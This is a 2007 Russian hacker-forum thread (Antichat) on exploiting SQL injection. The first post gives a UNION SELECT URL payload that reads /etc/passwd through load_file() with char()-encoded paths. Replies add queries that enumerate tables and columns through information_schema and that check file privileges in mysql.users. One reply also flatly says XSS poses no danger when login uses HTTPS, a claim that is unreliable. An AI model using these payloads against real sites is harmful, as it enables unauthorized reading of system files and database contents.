ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

3 вопросов не дают спать.
  #1  
Старый 20.02.2007, 23:37
OneMiay
Познающий
Регистрация: 04.06.2006
Сообщений: 33
Провел на форуме:
204953

Репутация: 117
Question 3 вопросов не дают спать.

Всем привет! Вот возникло 3 вопроса на которые просто необходимы ответы.
Просьба на Google не посылать, а то я щя сижу на GPRS-е, что очень дорого…
Я прочитал все факи но ответов там не нашёл…
1) Как узнать возможна ли функция Load_File() при SQL-inj.?
И катит ли такой вариант: К примеру поле 5 имеет вывод в заголовок новости
и выполняя вот такой запрос http://target.com/index.php?id=-1+union+select+1,2,3,4,if(load_file(char(47,101,11 6,99,47,112,97,115,115,119,100)) is null,1,2),6,7,8,9,10,11/* мы получаем заголовке новости будет 1, тогда функция не работает, иначе всё Ok.
2) Какой функцией можно добавить новость или таблицу, нужно ли для этого особые права и реально таким образам сделать инклуд????
3) Опасна ли XSS если авторизация проходит по https-протоколу????
Помогите кто чем может Plizzzzze.
 

  #2  
Старый 20.02.2007, 23:44
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332

Репутация: 1276


По умолчанию

1) select if(load_file("blalala") is null,1,2);
2) Создание таблици CREATE TABLE, добавить запись INSERT INTO, а как ты хочешь сделать инклудит через SQL, удачи
3) НЕТ!
 

  #3  
Старый 21.02.2007, 22:45
OneMiay
Познающий
Регистрация: 04.06.2006
Сообщений: 33
Провел на форуме:
204953

Репутация: 117
По умолчанию

Цитата:
Сообщение от DIAgen  
1) select if(load_file("blalala") is null,1,2);
2) Создание таблици CREATE TABLE, добавить запись INSERT INTO, а как ты хочешь сделать инклудит через SQL, удачи
3) НЕТ!
Большое спасибо!
Но вот тогда каким образом можна узнать имена таблиц, не уже ли только перебором????
 

  #4  
Старый 21.02.2007, 22:51
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Цитата:
Сообщение от OneMiay  
Но вот тогда каким образом можна узнать имена таблиц, не уже ли только перебором????
Ну, по сути да, только перебором, либо ручками, либо брутфорсом в скуль-инжекшон тул, хотя имхо руки рулят
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 

  #5  
Старый 24.02.2007, 22:19
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

Если sql >=5.0 тогда можно узнать с помощью
таблицы:select table_name from information_schema.tables
колонки: select column_name from information_schema.columns where table_name='table'
 

  #6  
Старый 26.02.2007, 23:39
OneMiay
Познающий
Регистрация: 04.06.2006
Сообщений: 33
Провел на форуме:
204953

Репутация: 117
По умолчанию

Цитата:
Сообщение от kair  
Если sql >=5.0 тогда можно узнать с помощью
таблицы:select table_name from information_schema.tables
колонки: select column_name from information_schema.columns where table_name='table'
Отлично! Спасибо тебе!!!! Это мне очень помагло!
 

  #7  
Старый 27.02.2007, 00:02
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

2 OneMiay
1) а)смотришь под каким ты юзером
Цитата:
user()
б) если права позволяют, то смотришь в mysql.users
Цитата:
SELECT concat(file_priv,char(58),name) FROM mysql.users WHERE name='твой_юзер'
выдет что-то типа
Цитата:
N:admin
или
Y:root
Y - есть права юзать Load_File()
N - нет прав
__________________

Последний раз редактировалось +toxa+; 27.02.2007 в 00:19..
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Хостинги под всё! »Atom1c« ПО для Web разработчика 29 10.02.2009 17:56
Пару вопросов по MySQL gadjet Уязвимости 10 30.12.2006 15:39
Пара обыкновенных Вопросов о Персональных Ассистентах. Пастырь Аппаратное обеспечение 21 15.08.2006 01:42
пара вопросов, Solaris null_access *nix 5 14.05.2006 13:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ